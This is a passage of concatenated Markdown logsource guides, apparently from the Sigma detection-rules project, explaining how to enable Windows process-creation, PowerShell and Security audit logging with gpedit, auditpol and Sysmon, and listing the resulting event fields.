You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation) #### Include Command-Line In Process Creation Events If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Administrative Templates - System - Audit Process Creation - Include Command Line In Process Creation Events ``` ### Microsoft-Windows-Sysmon #### Process Creation - Provider: `Microsoft-Windows-Sysmon` - Channel: `Microsoft-Windows-Sysmon/Operational` - Event Volume: `High` - EventID(s): - `1` To configure Sysmon process creation events you can follow the instructions below - Download [Sysmon](https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon) - Install Sysmon using an appropriate configuration. The configuration must include a `ProcessCreate` rule element. We recommend the following configuration [sysmonconfig-export.xml](https://github.com/Neo23x0/sysmon-config/blob/master/sysmonconfig-export.xml). ```powershell sysmon -i /path/to/config ``` ## Event Fields > **Note** > > For rules using this category in Sigma, be aware that there is a mapping between `Sysmon EID 1` fields and `Microsoft Windows Security Auditing EID: 4688`. While you can use the fields of `EID 4688`, it's best to use the Sysmon ones. ### Provider: Microsoft Windows Security Auditing / EventID: 4688
Expand ```yml - SubjectUserSid - SubjectUserName - SubjectDomainName - SubjectLogonId - NewProcessId - NewProcessName - TokenElevationType - ProcessId - CommandLine - TargetUserSid - TargetUserName - TargetDomainName - TargetLogonId - ParentProcessName - MandatoryLabel ```
### Provider: Microsoft-Windows-Sysmon / EventID: 1
Expand ```yml - RuleName - UtcTime - ProcessGuid - ProcessId - Image - FileVersion - Description - Product - Company - OriginalFileName - CommandLine - CurrentDirectory - User - LogonGuid - LogonId - TerminalSessionId - IntegrityLevel - Hashes - ParentProcessGuid - ParentProcessId - ParentImage - ParentCommandLine - ParentUser ```
================================================ FILE: documentation/logsource-guides/windows/category/ps_module.md ================================================ # category: ps_module ID: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b ## Content
Expand - [category: ps\_module](#category-ps_module) - [Content](#content) - [Description](#description) - [Event Source(s)](#event-sources) - [PowerShell 5](#powershell-5) - [PowerShell 7](#powershell-7) - [Logging Setup](#logging-setup) - [Microsoft-Windows-PowerShell](#microsoft-windows-powershell) - [Provider: PowerShellCore](#provider-powershellcore) - [Event Fields](#event-fields) - [Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)](#provider-microsoft-windows-powershell--eventid-4103-powershell-5) - [Provider: PowerShellCore / EventID: 4103 (PowerShell 7)](#provider-powershellcore--eventid-4103-powershell-7)
## Description This logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `ps_module` category. ## Event Source(s) ### PowerShell 5 ```yml Provider: Microsoft-Windows-PowerShell GUID: {a0c1853b-5c40-4b15-8766-3cf1c58f985a} Channel: Microsoft-Windows-PowerShell/Operational EventID: 4103 ``` ### PowerShell 7 ```yml Provider: PowerShellCore GUID: {f90714a8-5509-434a-bf6d-b1624c8a19a2} Channel: PowerShellCore/Operational EventID: 4103 ``` ## Logging Setup ### Microsoft-Windows-PowerShell - Event Volume: TBD - EventID(s): - `4103` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Administrative Templates - Windows Components - Windows PowerShell - Turn On Module Logging - Select List Of Modules According To Your Audit Policy (or use '*' to select all modules) ``` ### Provider: PowerShellCore - Event Volume: TBD - EventID(s): - `4103` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Administrative Templates - PowerShell Core - Turn On Module Logging - Select List Of Modules According To Your Audit Policy (or use '*' to select all modules) ``` > **Note** > > By default when you install PowerShell 7 the logging template isn't available. You can install it by using the PowerShell script available in the installation directory `InstallPSCorePolicyDefinitions.ps1` ## Event Fields ### Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)
Expand ```yml - ContextInfo - UserData - Payload ```
### Provider: PowerShellCore / EventID: 4103 (PowerShell 7)
Expand ```yml - ContextInfo - UserData - Payload ```
================================================ FILE: documentation/logsource-guides/windows/category/ps_script.md ================================================ # category: ps_script ID: bade5735-5ab0-4aa7-a642-a11be0e40872 ## Content
Expand - [category: ps\_script](#category-ps_script) - [Content](#content) - [Description](#description) - [Event Source(s)](#event-sources) - [PowerShell 5](#powershell-5) - [PowerShell 7](#powershell-7) - [Logging Setup](#logging-setup) - [Provider: Microsoft-Windows-PowerShell](#provider-microsoft-windows-powershell) - [Provider: PowerShellCore](#provider-powershellcore) - [Event Fields](#event-fields) - [Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)](#provider-microsoft-windows-powershell--eventid-4103-powershell-5) - [Provider: PowerShellCore / EventID: 4103 (PowerShell 7)](#provider-powershellcore--eventid-4103-powershell-7)
## Description This logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `ps_script` category. ## Event Source(s) ### PowerShell 5 ```yml Provider: Microsoft-Windows-PowerShell GUID: {a0c1853b-5c40-4b15-8766-3cf1c58f985a} Channel: Microsoft-Windows-PowerShell/Operational EventID: 4104 ``` ### PowerShell 7 ```yml Provider: PowerShellCore GUID: {f90714a8-5509-434a-bf6d-b1624c8a19a2} Channel: PowerShellCore/Operational EventID: 4104 ``` ## Logging Setup ### Provider: Microsoft-Windows-PowerShell - Event Volume: TBD - EventID(s): - `4104` ```yml - Computer Configuration - Administrative Templates - Windows Components - Windows PowerShell - Turn On PowerShell Script Block Logging ``` ### Provider: PowerShellCore - Event Volume: TBD - EventID(s): - `4104` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Administrative Templates - PowerShell Core - Turn On PowerShell Script Block Logging ``` > **Note** > > By default when you install PowerShell 7 the logging template isn't available. You can install it by using the PowerShell script available in the installation directory `InstallPSCorePolicyDefinitions.ps1` ## Event Fields ### Provider: Microsoft-Windows-PowerShell / EventID: 4103 (PowerShell 5)
Expand ```yml - MessageNumber - MessageTotal - ScriptBlockText - ScriptBlockId - Path ```
### Provider: PowerShellCore / EventID: 4103 (PowerShell 7)
Expand ```yml - MessageNumber - MessageTotal - ScriptBlockText - ScriptBlockId - Path ```
================================================ FILE: documentation/logsource-guides/windows/category/registry_add.md ================================================ **Coming Soon** ================================================ FILE: documentation/logsource-guides/windows/category/registry_delete.md ================================================ **Coming Soon** ================================================ FILE: documentation/logsource-guides/windows/category/registry_event.md ================================================ **Coming Soon** ================================================ FILE: documentation/logsource-guides/windows/category/registry_rename.md ================================================ **Coming Soon** ================================================ FILE: documentation/logsource-guides/windows/category/registry_set.md ================================================ **Coming Soon** ================================================ FILE: documentation/logsource-guides/windows/service/powershell.md ================================================ **Coming Soon** ================================================ FILE: documentation/logsource-guides/windows/service/security.md ================================================ # service: security ID: dfd8c0f4-e6ad-4e07-b91b-f2fca0ddef64 ## Content
Details - [service: security](#service-security) - [Content](#content) - [Description](#description) - [Event Source(s)](#event-sources) - [Logging Setup](#logging-setup) - [Account Logon](#account-logon) - [Credential Validation](#credential-validation) - [Kerberos Authentication Service](#kerberos-authentication-service) - [Kerberos Service Ticket Operations](#kerberos-service-ticket-operations) - [Other Account Logon Events](#other-account-logon-events) - [Account Management](#account-management) - [Application Group Management](#application-group-management) - [Computer Account Management](#computer-account-management) - [Distribution Group Management](#distribution-group-management) - [Other Account Management Events](#other-account-management-events) - [Security Group Management](#security-group-management) - [User Account Management](#user-account-management) - [Detailed Tracking](#detailed-tracking) - [DPAPI Activity](#dpapi-activity) - [PNP Activity](#pnp-activity) - [Process Creation](#process-creation) - [Process Termination](#process-termination) - [RPC Events](#rpc-events) - [Token Right Adjusted](#token-right-adjusted) - [DS Access](#ds-access) - [Detailed Directory Service Replication](#detailed-directory-service-replication) - [Directory Service Access](#directory-service-access) - [Directory Service Changes](#directory-service-changes) - [Directory Service Replication](#directory-service-replication) - [Logon/Logoff](#logonlogoff) - [Account Lockout](#account-lockout) - [User/Device Claims](#userdevice-claims) - [Group Membership](#group-membership) - [IPsec Extended Mode](#ipsec-extended-mode) - [IPsec Main Mode](#ipsec-main-mode) - [IPsec Quick Mode](#ipsec-quick-mode) - [Logoff](#logoff) - [Logon](#logon) - [Network Policy Server](#network-policy-server) - [Other Logon/Logoff Events](#other-logonlogoff-events) - [Special Logon](#special-logon) - [Object Access](#object-access) - [Application Generated](#application-generated) - [Certification 
Services](#certification-services) - [Detailed File Share](#detailed-file-share) - [File Share](#file-share) - [File System](#file-system) - [Filtering Platform Connection](#filtering-platform-connection) - [Filtering Platform Packet Drop](#filtering-platform-packet-drop) - [Handle Manipulation](#handle-manipulation) - [Kernel Object](#kernel-object) - [Other Object Access Events](#other-object-access-events) - [Registry](#registry) - [Removable Storage](#removable-storage) - [SAM](#sam) - [Central Access Policy Staging](#central-access-policy-staging) - [Policy Change](#policy-change) - [Audit Policy Change](#audit-policy-change) - [Authentication Policy Change](#authentication-policy-change) - [Authorization Policy Change](#authorization-policy-change) - [Filtering Platform Policy Change](#filtering-platform-policy-change) - [MPSSVC Rule-Level Policy Change](#mpssvc-rule-level-policy-change) - [Other Policy Change Events](#other-policy-change-events) - [Privilege Use](#privilege-use) - [Non Sensitive Privilege Use](#non-sensitive-privilege-use) - [Other Privilege Use Events](#other-privilege-use-events) - [Sensitive Privilege Use](#sensitive-privilege-use) - [System](#system) - [IPsec Driver](#ipsec-driver) - [Other System Events](#other-system-events) - [Security State Change](#security-state-change) - [Security System Extension](#security-system-extension) - [System Integrity](#system-integrity) - [Global Object Access Auditing](#global-object-access-auditing) - [Full Event(s) List](#full-events-list) - [Event Fields](#event-fields) - [Provider: Microsoft Windows Security Auditing / EventID: 4624](#provider-microsoft-windows-security-auditing--eventid-4624) - [Provider: Microsoft Windows Security Auditing / EventID: 4627](#provider-microsoft-windows-security-auditing--eventid-4627) - [Provider: Microsoft Windows Security Auditing / EventID: 4663](#provider-microsoft-windows-security-auditing--eventid-4663) - [Provider: Microsoft Windows Security Auditing / 
EventID: 4670](#provider-microsoft-windows-security-auditing--eventid-4670) - [Provider: Microsoft Windows Security Auditing / EventID: 4672](#provider-microsoft-windows-security-auditing--eventid-4672) - [Provider: Microsoft Windows Security Auditing / EventID: 4673](#provider-microsoft-windows-security-auditing--eventid-4673) - [Provider: Microsoft Windows Security Auditing / EventID: 4688](#provider-microsoft-windows-security-auditing--eventid-4688) - [Provider: Microsoft Windows Security Auditing / EventID: 4689](#provider-microsoft-windows-security-auditing--eventid-4689) - [Provider: Microsoft Windows Security Auditing / EventID: 4702](#provider-microsoft-windows-security-auditing--eventid-4702) - [Provider: Microsoft Windows Security Auditing / EventID: 4703](#provider-microsoft-windows-security-auditing--eventid-4703) - [Provider: Microsoft Windows Security Auditing / EventID: 4957](#provider-microsoft-windows-security-auditing--eventid-4957) - [Provider: Microsoft Windows Security Auditing / EventID: 5447](#provider-microsoft-windows-security-auditing--eventid-5447)
## Description This logsource guide describes how to enable the necessary logging to make use of SIGMA rules that leverage the `security` service. ## Event Source(s) ```yml Provider: Microsoft Windows Security Auditing GUID: {54849625-5478-4994-a5ba-3e3b0328c30d} Channel: Security ``` ## Logging Setup ### Account Logon #### Credential Validation - Subcategory GUID: `{0CCE923F-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4774` - `4775` - `4776` - `4777` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Account Logon - Audit Credential Validation - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE923F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-credential-validation) #### Kerberos Authentication Service - Subcategory GUID: `{0CCE9242-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High on Kerberos Key Distribution Center servers` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4768` - `4771` - `4772` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Account Logon - Audit Kerberos Authentication Service - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9242-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9242-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kerberos-authentication-service) #### Kerberos Service Ticket Operations - Subcategory GUID: `{0CCE9240-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Very High on Kerberos Key Distribution Center servers` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4769` - `4770` - `4773` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Account Logon - Audit Kerberos Service Ticket Operations - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9240-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9240-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kerberos-service-ticket-operations) #### Other Account Logon Events - Subcategory GUID: `{0CCE9241-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: TBD - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - TBD If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Account Logon - Audit Other Account Logon Events - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9241-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9241-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-account-logon-events) ### Account Management #### Application Group Management - Subcategory GUID: `{0CCE9239-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: TBD - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4783` - `4784` - `4785` - `4786` - `4787` - `4788` - `4789` - `4790` - `4791` - `4792` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Account Management - Audit Application Group Management - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9239-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9239-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-application-group-management) #### Computer Account Management - Subcategory GUID: `{0CCE9236-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low on domain controllers` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4741` - `4742` - `4743` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Account Management - Audit Computer Account Management - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9236-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9236-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-computer-account-management) #### Distribution Group Management - Subcategory GUID: `{0CCE9238-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low on Domain Controllers` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4749` - `4750` - `4751` - `4752` - `4753` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Account Management - Audit Distribution Group Management - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9238-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9238-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-distribution-group-management) #### Other Account Management Events - Subcategory GUID: `{0CCE923A-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Typically Low on all types of computers` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4782` - `4793` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Account Management - Audit Other Account Management Events - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE923A-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE923A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-account-management-events) #### Security Group Management - Subcategory GUID: `{0CCE9237-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4728` - `4731` - `4732` - `4733` - `4734` - `4735` - `4764` - `4799` - `4727` - `4737` - `4729` - `4730` - `4754` - `4755` - `4756` - `4757` - `4758` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Account Management - Audit Security Group Management - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9237-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9237-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-security-group-management) #### User Account Management - Subcategory GUID: `{0CCE9235-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4720` - `4722` - `4723` - `4724` - `4725` - `4726` - `4738` - `4740` - `4765` - `4766` - `4767` - `4780` - `4781` - `4794` - `4798` - `5376` - `5377` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Account Management - Audit User Account Management - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9235-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9235-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-user-account-management) ### Detailed Tracking #### DPAPI Activity - Subcategory GUID: `{0CCE922D-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4692` - `4693` - `4694` - `4695` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Detailed Tracking - Audit DPAPI Activity - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE922D-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE922D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-dpapi-activity) #### PNP Activity - Subcategory GUID: `{0CCE9248-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Varies, depending on how the computer is used. 
Typically Low.` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `6416` - `6419` - `6420` - `6421` - `6422` - `6423` - `6424` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Detailed Tracking - Audit PNP Activity - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE9248-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE9248-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-pnp-activity) #### Process Creation - Subcategory GUID: `{0CCE922B-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4688` - `4696` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Detailed Tracking - Audit Process Creation - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable # Enable 
both Success and Failure auditing auditpol /set /subcategory:{0CCE922B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-creation) #### Process Termination - Subcategory GUID: `{0CCE922C-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `Low to Medium, depending on system usage.` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4689` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Detailed Tracking - Audit Process Termination - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE922C-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE922C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-process-termination) #### RPC Events - Subcategory GUID: `{0CCE922E-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: TBD - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `5712` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Detailed Tracking - Audit RPC Events - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE922E-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE922E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-rpc-events) #### Token Right Adjusted - Subcategory GUID: `{0CCE924A-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4703` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - Detailed Tracking - Audit Token Right Adjusted - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE924A-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE924A-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-token-right-adjusted) ### DS Access #### Detailed Directory Service Replication - Subcategory GUID: `{0CCE923E-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `These events can create a very high volume of event data on domain controllers` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4928` - `4929` - `4930` - `4931` - `4934` - `4935` - `4936` - `4937` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - DS Access - Audit Detailed Directory Service Replication - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE923E-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE923E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-detailed-directory-service-replication) #### Directory Service Access - Subcategory GUID: `{0CCE923B-69AE-11D9-BED3-505054503030}` - Provider: `Microsoft Windows Security Auditing` - Channel: `Security` - Event Volume: `High on servers running AD DS role services.` - API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing) - EventID(s): - `4661` - `4662` If you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below ```yml - Computer Configuration - Windows Settings - Security Settings - Advanced Audit Policy Configuration - System Audit Policies - Local Group Policy Object - DS Access - Audit Directory Service Access - Success and Failure ``` Alternatively you can enable logging via `auditpol` using the following command(s): ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE923B-69AE-11D9-BED3-505054503030}, /success:enable # Enable both Success and Failure auditing auditpol /set /subcategory:{0CCE923B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable ``` If you want to learn more about this sub-category. 
